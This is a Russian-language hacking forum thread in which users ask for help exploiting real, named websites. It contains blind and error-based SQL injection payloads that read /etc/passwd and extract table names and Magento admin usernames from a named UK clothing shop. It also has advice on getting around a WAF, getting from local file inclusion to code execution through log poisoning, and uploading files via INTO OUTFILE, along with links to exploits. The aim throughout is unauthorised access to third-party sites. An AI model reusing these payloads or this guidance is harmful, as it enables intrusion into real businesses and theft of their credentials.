Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  2. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Нужно логи с еррорами инклудить?
    тут /proc/self/environ недоступен
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    как минимум нужен инклуд, да. все остальное стандартно, пытайтесь записать ваш код в еррор логи, ацес логи, логи авторизации
    http://itix.pp.ua/2013/01/06/безопа...local-file-include-и-rfi-remote-file-include/
    у вас lfi?
     
    _________________________
  4. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Ребяяяяяяят, подскажите, можно тут как-то раскрутить? Ни разу не раскручивала подобного рода :(
    Code:
    http://photo{REMOVE}vogue.arta{REMOVE}ndcommerce.com/res{REMOVE}ults.php?type=search&search=fashion+or+beauty'&sortby=dtc&page=2
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    из запроса вырезаются кавычки, но перед этим экранируются - поэтому и появляется ошибка. однако внедирть ничего после кавычки не вышло
     
    _________________________
  6. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Да, LFI
    акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду
    Еррор логи я думаю меньше намного и иклудить стоит именно их.
    А где логи авторизации хранятся?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://www.lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/
    посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer
    совсем забыл: https://rdot.org/forum/showthread.php?t=1134
     
    _________________________
  8. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Первая статья кул!
    Со второй статьей не понял.
    Идет речь о замедленной передаче $_FILES в temp директорию?
    Что за файл /tmp/lastline?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    оттуда вам нужен только сплойт. https://rdot.org/forum/showpost.php?p=18024&postcount=11
    указываете путь до phpinfo, /etc/passwd и запускаете
     
    _________________________
  10. palec2006

    palec2006 Banned

    Joined:
    30 Oct 2012
    Messages:
    38
    Likes Received:
    33
    Reputations:
    8
    помогите люди добрые.
    слепая:
    PHP:
    'or(if(load_file('/etc/passwd') is not NULL,sleep(1),0))or'
    PHP:
    'or(if(ascii(substring((load_file('/etc/passwd')),461))>=117,sleep(1),0))or'
    фильтрации нет, пролазит всё,
    обрезать or' не могу

    с заливкой борода:
    PHP:
    'or(select 1 into outfile '/tmp/1.txt')or'
    не дает результата
    есть варианты залится?
     
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Code:
    https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1)*'
    Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется.

    Code:
    https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+from+infromation_schema.tables+limit+0,1)),1)*'
    результата не дает.
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(group_concat(table_name))from(information_schema.tables))),1)*'
    дайте ссылку глянуть
     
    _________________________
    Br@!ns and kingbeef like this.
  13. palec2006

    palec2006 Banned

    Joined:
    30 Oct 2012
    Messages:
    38
    Likes Received:
    33
    Reputations:
    8
    извините, слишком жирный рес чтоб светить
     
  14. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    нужный запрос:
    Code:
    https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(mid(group_concat(username),1,1032))from(magento_admin_user))),1)*'
    WAF запрещает последовательные записи в url строке select и admin_user как я понял
    Помогите выполнить запрос
     
  15. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.isoimagesuk.com/pixaria.thumbnail.php?file=L25mcy9jMDkvaDA1L21udC8xMzI0MzYvZG9tYWlucy9pc29pbWFnZXN1ay5jb20vaHRtbC9yZXNvdXJjZXMvbGlicmFyeS8yMDE0LTA0LTE4LzgweDgwL0lTT19FWENBTExST1VORF9FQVNURU5ERVJTU1BPSUxFUl9MVUNZX0dSQVZFU0lERTg2NS5qcGc=
    вроде как LFI. ну по сути file=... в base64 абсолютный путь
    Но не знаю как раскрутить короче. не очень стандартно тут. Есть идеи?
     
  16. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Ребят,я вот понять не могу. Nikto говорит,что можно заюзать уязвимость,отправляя спец. запрос,аля:
    /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 (php-credits)
    /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 (http://s018.radikal.ru/i512/1504/73/b71e3ddc27cb.gif )
    /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 (php)
    /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 (zend engine 2)
    Где об этом можно почитать? И что из этого можно получить?
    P/S. так же есть PMA (3.4.11.1) и SquirrelMail (version 1.4.23 [SVN]). Буду благодарен за любую помощь!
    (PHP Version 5.4.36-0+deb7u3
    This program makes use of the Zend Scripting Language Engine:
    Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
    )
     
    #24116 xxl, 26 Apr 2015
    Last edited: 26 Apr 2015
  17. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    гуглите пасхальные яйца php :)
     
  18. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    "Сразу хочется подчеркнуть, что пасхальные яйца PHP, о которых пойдёт речь, абсолютно безобидны" =(((
     
  19. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    /setup/ = Невозможно загрузить или сохранить настройки (т.к. нет каталога config)
    [​IMG]
    тоже странно...Юзеры же есть на сайте + инфа явно из бд чекается
     
    #24119 xxl, 26 Apr 2015
    Last edited: 26 Apr 2015
  20. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    простите, что дублирую, у кого-нибудь есть идеи? или тут макс. что проверка на возможность чтения файла?
     
Thread Status:
Not open for further replies.